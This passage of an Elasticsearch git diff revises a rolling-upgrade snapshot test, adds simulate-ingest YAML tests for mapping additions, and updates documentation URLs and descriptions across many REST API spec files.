org.elasticsearch.test.rest.ObjectPath; import java.io.IOException; -import java.util.Collection; import java.util.Map; import java.util.stream.Collectors; @@ -26,7 +24,6 @@ import static org.hamcrest.Matchers.containsInAnyOrder; import static org.hamcrest.Matchers.empty; import static org.hamcrest.Matchers.equalTo; -import static org.hamcrest.Matchers.hasSize; import static org.hamcrest.Matchers.not; public class RunningSnapshotIT extends AbstractRollingUpgradeTestCase { @@ -45,6 +42,13 @@ public void testRunningSnapshotCompleteAfterUpgrade() throws Exception { .collect(Collectors.toUnmodifiableMap(Map.Entry::getKey, entry -> entry.getValue().get("name").toString())); assertThat(nodeIdToNodeNames.values(), containsInAnyOrder("test-cluster-0", "test-cluster-1", "test-cluster-2")); + final var lastUpgradeNodeId = nodeIdToNodeNames.entrySet() + .stream() + .filter(entry -> "test-cluster-2".equals(entry.getValue())) + .map(Map.Entry::getKey) + .findFirst() + .orElseThrow(() -> new AssertionError("node id not found in " + nodeIdToNodeNames)); + if (isOldCluster()) { registerRepository(repositoryName, "fs", randomBoolean(), Settings.builder().put("location", "backup").build()); // create an index to have one shard per node @@ -54,54 +58,41 @@ public void testRunningSnapshotCompleteAfterUpgrade() throws Exception { indexDocs(indexName, between(10, 50)); } flush(indexName, true); - // Signal shutdown to prevent snapshot from being completed - putShutdownMetadata(nodeIdToNodeNames.keySet()); + // Signal shutdown for the last node to upgrade to prevent snapshot from being completed during the upgrade process + putShutdownMetadata(lastUpgradeNodeId); createSnapshot(repositoryName, snapshotName, false); assertRunningSnapshot(repositoryName, snapshotName); } else { if (isUpgradedCluster()) { - deleteShutdownMetadata(nodeIdToNodeNames.keySet()); - assertNoShutdownMetadata(nodeIdToNodeNames.keySet()); + deleteShutdownMetadata(lastUpgradeNodeId); + assertNoShutdownMetadata(lastUpgradeNodeId); ensureGreen(indexName); assertBusy(() -> assertCompletedSnapshot(repositoryName, snapshotName)); } else { - if (isFirstMixedCluster()) { - final var upgradedNodeIds = nodeIdToNodeNames.entrySet() - .stream() - .filter(entry -> "test-cluster-0".equals(entry.getValue())) - .map(Map.Entry::getKey) - .collect(Collectors.toUnmodifiableSet()); - assertThat(upgradedNodeIds, hasSize(1)); - deleteShutdownMetadata(upgradedNodeIds); - } assertRunningSnapshot(repositoryName, snapshotName); } } } - private void putShutdownMetadata(Collection nodeIds) throws IOException { - for (String nodeId : nodeIds) { - final Request putShutdownRequest = new Request("PUT", "/_nodes/" + nodeId + "/shutdown"); - putShutdownRequest.setJsonEntity(""" - { - "type": "remove", - "reason": "test" - }"""); - client().performRequest(putShutdownRequest); - } + private void putShutdownMetadata(String nodeId) throws IOException { + final Request putShutdownRequest = new Request("PUT", "/_nodes/" + nodeId + "/shutdown"); + putShutdownRequest.setJsonEntity(""" + { + "type": "remove", + "reason": "test" + }"""); + client().performRequest(putShutdownRequest); } - private void deleteShutdownMetadata(Collection nodeIds) throws IOException { - for (String nodeId : nodeIds) { - final Request request = new Request("DELETE", "/_nodes/" + nodeId + "/shutdown"); - request.addParameter(IGNORE_RESPONSE_CODES_PARAM, "404"); - client().performRequest(request); - } + private void deleteShutdownMetadata(String nodeId) throws IOException { + final Request request = new Request("DELETE", "/_nodes/" + nodeId + "/shutdown"); + request.addParameter(IGNORE_RESPONSE_CODES_PARAM, "404"); + client().performRequest(request); } - private void assertNoShutdownMetadata(Collection nodeIds) throws IOException { + private void assertNoShutdownMetadata(String nodeId) throws IOException { final ObjectPath responsePath = assertOKAndCreateObjectPath( - client().performRequest(new Request("GET", "/_nodes/" + Strings.collectionToCommaDelimitedString(nodeIds) + "/shutdown")) + client().performRequest(new Request("GET", "/_nodes/" + nodeId + "/shutdown")) ); assertThat(responsePath.evaluate("nodes"), empty()); } diff --git a/qa/smoke-test-http/src/internalClusterTest/java/org/elasticsearch/http/snapshots/RestGetSnapshotsIT.java b/qa/smoke-test-http/src/internalClusterTest/java/org/elasticsearch/http/snapshots/RestGetSnapshotsIT.java index 683990d51d4a8..eb3b95ff27595 100644 --- a/qa/smoke-test-http/src/internalClusterTest/java/org/elasticsearch/http/snapshots/RestGetSnapshotsIT.java +++ b/qa/smoke-test-http/src/internalClusterTest/java/org/elasticsearch/http/snapshots/RestGetSnapshotsIT.java @@ -204,7 +204,7 @@ public void testSortAndPaginateWithInProgress() throws Exception { inProgressSnapshots.add(AbstractSnapshotIntegTestCase.startFullSnapshot(logger, repoName, snapshotName, false)); } AbstractSnapshotIntegTestCase.awaitNumberOfSnapshotsInProgress(logger, inProgressCount); - AbstractSnapshotIntegTestCase.awaitClusterState(logger, state -> { + AbstractSnapshotIntegTestCase.awaitClusterState(state -> { final var snapshotsInProgress = SnapshotsInProgress.get(state); boolean firstIndexSuccessfullySnapshot = snapshotsInProgress.asStream() .flatMap(s -> s.shards().entrySet().stream()) diff --git a/qa/smoke-test-ingest-with-all-dependencies/src/yamlRestTest/resources/rest-api-spec/test/ingest/80_ingest_simulate.yml b/qa/smoke-test-ingest-with-all-dependencies/src/yamlRestTest/resources/rest-api-spec/test/ingest/80_ingest_simulate.yml index ba4e73f0c5e09..2cccc8988ff0e 100644 --- a/qa/smoke-test-ingest-with-all-dependencies/src/yamlRestTest/resources/rest-api-spec/test/ingest/80_ingest_simulate.yml +++ b/qa/smoke-test-ingest-with-all-dependencies/src/yamlRestTest/resources/rest-api-spec/test/ingest/80_ingest_simulate.yml @@ -1740,3 +1740,194 @@ setup: - match: { docs.0.doc._source.abc: "sfdsfsfdsfsfdsfsfdsfsfdsfsfdsf" } - match: { docs.0.doc.ignored_fields: [ {"field": "abc"} ] } - not_exists: docs.0.doc.error + +--- +"Test mapping addition correctly respects mapping of indices without templates": + # In this test, we make sure that when we have an index that has mapping but was not built with a template, that the + # additional_mapping respects the existing mapping for validation. + + - skip: + features: + - headers + - allowed_warnings + + # A global match-everything legacy template is added to the cluster sometimes (rarely). We have to get rid of this template if it exists + # because this test is making sure we get correct behavior when an index matches *no* template: + - do: + indices.delete_template: + name: '*' + ignore: 404 + + # We create the index no-template-index with an implicit mapping that has a foo field with type long: + - do: + bulk: + refresh: true + body: + - '{"index": {"_index": "no-template-index"}}' + - '{"foo": 3}' + + # Now we make sure that the existing mapping is taken into account when we simulate with a mapping_addition. Since + # the pre-existing mapping has foo mapped as a long, this ought to fail with a document_parsing_exception because + # we are attempting to write a boolean foo. + - do: + headers: + Content-Type: application/json + simulate.ingest: + index: no-template-index + body: > + { + "docs": [ + { + "_id": "test-id", + "_index": "no-template-index", + "_source": { + "@timestamp": "2025-07-25T09:06:06.929Z", + "is_valid": true, + "foo": true + } + } + ], + "mapping_addition": { + "properties": { + "is_valid": { + "type": "boolean" + } + } + } + } + - length: { docs: 1 } + - match: { docs.0.doc._index: "no-template-index" } + - match: { docs.0.doc._source.foo: true } + - match: { docs.0.doc._source.is_valid: true } + - match: { docs.0.doc.error.type: "document_parsing_exception" } + + # Now we add a template for this index. + - do: + indices.put_template: + name: my-template-1 + body: + index_patterns: no-template-index + mappings: + properties: + foo: + type: boolean + + # And we still expect the index's mapping to be used rather than the template: + - do: + headers: + Content-Type: application/json + simulate.ingest: + index: no-template-index + body: > + { + "docs": [ + { + "_id": "test-id", + "_index": "no-template-index", + "_source": { + "@timestamp": "2025-07-25T09:06:06.929Z", + "is_valid": true, + "foo": true + } + } + ], + "mapping_addition": { + "properties": { + "is_valid": { + "type": "boolean" + } + } + } + } + - length: { docs: 1 } + - match: { docs.0.doc._index: "no-template-index" } + - match: { docs.0.doc._source.foo: true } + - match: { docs.0.doc._source.is_valid: true } + - match: { docs.0.doc.error.type: "document_parsing_exception" } + +--- +"Test ingest simulate with mapping addition for data streams when write index has different mapping": + # In this test, we make sure that when a data stream's write index has a mapping that is different from the mapping + # in its template, and a mapping_override is given, then the mapping_override is applied to the mapping of the write + # index rather than the mapping of the template. + + - skip: + features: + - headers + - allowed_warnings + + - do: + cluster.put_component_template: + name: mappings_template + body: + template: + mappings: + dynamic: strict + properties: + foo: + type: boolean + bar: + type: boolean + + - do: + allowed_warnings: + - "index template [my-template-1] has index patterns [simple-data-stream1] matching patterns from existing older templates [global] with patterns (global => [*]); this template [my-template-1] will take precedence during new index creation" + indices.put_index_template: + name: my-template-1 + body: + index_patterns: [simple-data-stream1] + composed_of: + - mappings_template + data_stream: {} + + - do: + indices.create_data_stream: + name: simple-data-stream1 + - is_true: acknowledged + + - do: + cluster.health: + wait_for_status: yellow + + # Now that the data stream exists, we change the template to remove the mapping for bar. The write index still has the + # old mapping. + - do: + cluster.put_component_template: + name: mappings_template + body: + template: + mappings: + properties: + foo: + type: boolean + + # We expect the mapping_addition to be added to the mapping of the write index, which has a boolean bar field. So this + # simulate ingest ought to fail. + - do: + headers: + Content-Type: application/json + simulate.ingest: + index: simple-data-stream1 + body: > + { + "docs": [ + { + "_id": "asdf", + "_source": { + "@timestamp": 1234, + "bar": "baz" + } + } + ], + "mapping_addition": { + "properties": { + "baz": { + "type": "keyword" + } + } + } + } + - length: { docs: 1 } + - match: { docs.0.doc._index: "simple-data-stream1" } + - match: { docs.0.doc._source.bar: "baz" } + - match: { docs.0.doc.error.type: "document_parsing_exception" } diff --git a/rest-api-spec/build.gradle b/rest-api-spec/build.gradle index 7b73575f76ef3..f2142e8ba1c8d 100644 --- a/rest-api-spec/build.gradle +++ b/rest-api-spec/build.gradle @@ -90,4 +90,6 @@ tasks.named("yamlRestCompatTestTransform").configure ({ task -> task.skipTest("indices.create/21_synthetic_source_stored/field param - keep root array", "Synthetic source keep arrays now stores leaf arrays natively") task.skipTest("cluster.info/30_info_thread_pool/Cluster HTTP Info", "The search_throttled thread pool has been removed") task.skipTest("synonyms/80_synonyms_from_index/Fail loading synonyms from index if synonyms_set doesn't exist", "Synonyms do no longer fail if the synonyms_set doesn't exist") + task.skipTest("update/100_synthetic_source/keyword", "synthetic recovery source means _recovery_source field will not be present") + task.skipTest("update/100_synthetic_source/stored text", "synthetic recovery source means _recovery_source field will not be present") }) diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.delete_desired_balance.json b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.delete_desired_balance.json index b5c4eaa7fc6f9..651773303389d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.delete_desired_balance.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.delete_desired_balance.json @@ -1,8 +1,8 @@ { "_internal.delete_desired_balance":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/delete-desired-balance.html", - "description": "This API is a diagnostics API and the output should not be relied upon for building applications." + "url": null, + "description": "This API is a diagnostics API and the output should not be relied upon for building applications" }, "stability":"experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.delete_desired_nodes.json b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.delete_desired_nodes.json index 8b4759719a41b..03a9a1c8635ab 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.delete_desired_nodes.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.delete_desired_nodes.json @@ -1,8 +1,8 @@ { "_internal.delete_desired_nodes":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/delete-desired-nodes.html", - "description": "Deletes the desired nodes. Designed for indirect use by ECE/ESS and ECK. Direct use is not supported." + "url": null, + "description": "Designed for indirect use by ECE/ESS and ECK, direct use is not supported." }, "stability":"experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.get_desired_balance.json b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.get_desired_balance.json index 5922d77d99dc0..f2fccf852950b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.get_desired_balance.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.get_desired_balance.json @@ -1,8 +1,8 @@ { "_internal.get_desired_balance":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-desired-balance.html", - "description": "This API is a diagnostics API and the output should not be relied upon for building applications." + "url": null, + "description": "This API is a diagnostics API and the output should not be relied upon for building applications" }, "stability":"experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.get_desired_nodes.json b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.get_desired_nodes.json index 8fa21ec042c35..cf9a0799cd124 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.get_desired_nodes.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.get_desired_nodes.json @@ -1,8 +1,8 @@ { "_internal.get_desired_nodes":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-desired-nodes.html", - "description": "Gets the latest desired nodes. Designed for indirect use by ECE/ESS and ECK. Direct use is not supported." + "url": null, + "description": "Gets the latest desired nodes" }, "stability":"experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.prevalidate_node_removal.json b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.prevalidate_node_removal.json index 8c945f2894f2f..39b9b85f36273 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.prevalidate_node_removal.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.prevalidate_node_removal.json @@ -1,10 +1,10 @@ { "_internal.prevalidate_node_removal": { "documentation":{ - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/prevalidate-node-removal-api.html", + "url": null, "description":"Prevalidates node removal from the cluster" }, - "stability":"stable", + "stability":"experimental", "visibility":"private", "headers":{ "accept": [ "application/json"] diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.update_desired_nodes.json b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.update_desired_nodes.json index b2cdc77ef8f82..ae5c3962790f8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.update_desired_nodes.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.update_desired_nodes.json @@ -1,8 +1,8 @@ { "_internal.update_desired_nodes":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/update-desired-nodes.html", - "description": "Updates the desired nodes. Designed for indirect use by ECE/ESS and ECK. Direct use is not supported." + "url": null, + "description": "Designed for indirect use by ECE/ESS and ECK, direct use is not supported." }, "stability":"experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.delete.json b/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.delete.json index 7cfc14487a396..81ebbd2c1b348 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.delete.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.delete.json @@ -1,8 +1,8 @@ { "async_search.delete":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/async-search.html", - "description": "Deletes an async search by ID. If the search is still running, the search request will be cancelled. Otherwise, the saved search results are deleted." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-async-search-submit", + "description": "Delete an async search" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.get.json index 41cf08b631092..e1ea50e349850 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.get.json @@ -1,8 +1,8 @@ { "async_search.get":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/async-search.html", - "description": "Retrieves the results of a previously submitted async search request given its ID." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-async-search-submit", + "description": "Get async search results" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.status.json index a44c0648f2e8f..4e1ce41624a8c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.status.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.status.json @@ -1,8 +1,8 @@ { "async_search.status":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/async-search.html", - "description": "Retrieves the status of a previously submitted async search request given its ID." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-async-search-submit", + "description": "Get the async search status" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.submit.json b/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.submit.json index 8ae2fff22281c..b7d8a1272d1af 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.submit.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.submit.json @@ -1,8 +1,8 @@ { "async_search.submit":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/async-search.html", - "description": "Executes a search request asynchronously." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-async-search-submit", + "description": "Run an async search" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.delete_autoscaling_policy.json b/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.delete_autoscaling_policy.json index 79b542b73ca2e..89afca7b4c5fb 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.delete_autoscaling_policy.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.delete_autoscaling_policy.json @@ -1,8 +1,8 @@ { "autoscaling.delete_autoscaling_policy":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/autoscaling-delete-autoscaling-policy.html", - "description":"Deletes an autoscaling policy. Designed for indirect use by ECE/ESS and ECK. Direct use is not supported." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-autoscaling-delete-autoscaling-policy", + "description":"Delete an autoscaling policy" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.get_autoscaling_capacity.json b/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.get_autoscaling_capacity.json index b75ac52e3da23..ff9776b1e358c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.get_autoscaling_capacity.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.get_autoscaling_capacity.json @@ -1,8 +1,8 @@ { "autoscaling.get_autoscaling_capacity":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/autoscaling-get-autoscaling-capacity.html", - "description": "Gets the current autoscaling capacity based on the configured autoscaling policy. Designed for indirect use by ECE/ESS and ECK. Direct use is not supported." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-autoscaling-get-autoscaling-capacity", + "description": "Get the autoscaling capacity" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.get_autoscaling_policy.json b/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.get_autoscaling_policy.json index 1b0344245f174..b4b506fb60803 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.get_autoscaling_policy.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.get_autoscaling_policy.json @@ -1,8 +1,8 @@ { "autoscaling.get_autoscaling_policy":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/autoscaling-get-autoscaling-policy.html", - "description": "Retrieves an autoscaling policy. Designed for indirect use by ECE/ESS and ECK. Direct use is not supported." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-autoscaling-get-autoscaling-capacity", + "description": "Get an autoscaling policy" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.put_autoscaling_policy.json b/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.put_autoscaling_policy.json index 7e835fbe8dc43..dc7c862a2d027 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.put_autoscaling_policy.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/autoscaling.put_autoscaling_policy.json @@ -1,8 +1,8 @@ { "autoscaling.put_autoscaling_policy":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/autoscaling-put-autoscaling-policy.html", - "description": "Creates a new autoscaling policy. Designed for indirect use by ECE/ESS and ECK. Direct use is not supported." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-autoscaling-put-autoscaling-policy", + "description": "Create or update an autoscaling policy" }, "stability":"stable", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/bulk.json b/rest-api-spec/src/main/resources/rest-api-spec/api/bulk.json index 490bb6fd73bbe..5635d61d61355 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/bulk.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/bulk.json @@ -1,8 +1,8 @@ { "bulk":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/docs-bulk.html", - "description":"Allows to perform multiple index/update/delete operations in a single request." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-bulk", + "description":"Bulk index or delete documents" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.aliases.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.aliases.json index 9f97fe6280dc0..6ef0c07637497 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.aliases.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.aliases.json @@ -1,8 +1,8 @@ { "cat.aliases":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-alias.html", - "description":"Shows information about currently configured aliases to indices including filter and routing infos." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-aliases", + "description":"Get aliases" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.allocation.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.allocation.json index 9d19d8bb9569d..b729d1a0084c9 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.allocation.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.allocation.json @@ -1,8 +1,8 @@ { "cat.allocation":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-allocation.html", - "description":"Provides a snapshot of how many shards are allocated to each data node and how much disk space they are using." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-allocation", + "description":"Get shard allocation information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.component_templates.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.component_templates.json index 9dfeaf5575967..80ec61b4a85b5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.component_templates.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.component_templates.json @@ -1,8 +1,8 @@ { "cat.component_templates":{ "documentation":{ - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-component-templates.html", - "description":"Returns information about existing component_templates templates." + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-component-templates", + "description":"Get component templates" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.count.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.count.json index 64226f87bfd0f..1ed48e9d3a32c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.count.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.count.json @@ -1,8 +1,8 @@ { "cat.count":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-count.html", - "description":"Provides quick access to the document count of the entire cluster, or individual indices." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-count", + "description":"Get a document count" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.fielddata.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.fielddata.json index 497287a34ade5..4892a4caa3331 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.fielddata.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.fielddata.json @@ -1,8 +1,8 @@ { "cat.fielddata":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-fielddata.html", - "description":"Shows how much heap memory is currently being used by fielddata on every data node in the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-fielddata", + "description":"Get field data cache information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.health.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.health.json index 6b49c8e4428f7..e3cba20ad6dfd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.health.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.health.json @@ -1,8 +1,8 @@ { "cat.health":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-health.html", - "description":"Returns a concise representation of the cluster health." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-health", + "description":"Get the cluster health status" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.help.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.help.json index d31188fe7f7fc..629246db7f4e3 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.help.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.help.json @@ -1,8 +1,8 @@ { "cat.help":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat.html", - "description":"Returns help for the Cat APIs." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-cat", + "description":"Get CAT help" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.indices.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.indices.json index a809c96c3798a..ffc33a3ca16e5 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.indices.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.indices.json @@ -1,8 +1,8 @@ { "cat.indices":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-indices.html", - "description":"Returns information about indices: number of primaries and replicas, document counts, disk size, ..." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-indices", + "description":"Get index information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.master.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.master.json index 9041c48b17ec5..d2c48ebda82db 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.master.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.master.json @@ -1,8 +1,8 @@ { "cat.master":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/cat-master.html", - "description":"Returns information about the master node." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-master", + "description":"Get master node information" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_data_frame_analytics.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_data_frame_analytics.json index ded66961c3ed5..e0d52c6d75ed3 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_data_frame_analytics.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_data_frame_analytics.json @@ -1,8 +1,8 @@ { "cat.ml_data_frame_analytics":{ "documentation":{ - "url":"http://www.elastic.co/guide/en/elasticsearch/reference/current/cat-dfanalytics.html", - "description": "Gets configuration and usage information about data frame analytics jobs." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-ml-data-frame-analytics", + "description": "Get data frame analytics jobs" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_datafeeds.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_datafeeds.json index 884f1bad7583a..8784b2a7c5e19 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_datafeeds.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_datafeeds.json @@ -1,8 +1,8 @@ { "cat.ml_datafeeds":{ "documentation":{ - "url":"http://www.elastic.co/guide/en/elasticsearch/reference/current/cat-datafeeds.html", - "description": "Gets configuration and usage information about datafeeds." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-ml-datafeeds", + "description": "Get datafeeds" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_jobs.json b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_jobs.json index 91f0e63742b15..38f3b4fc68d65 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_jobs.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/cat.ml_jobs.json @@ -1,8 +1,8 @@ { "cat.ml_jobs":{ "documentation":{ - "url":"http://www.elastic.co/guide/en/elasticsearch/reference/current/cat-anomaly-detectors.html", - "description": "Gets configuration and usage information about anomaly detection jobs." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-ml-jobs", + "description": "Get anomaly detection jobs" }, 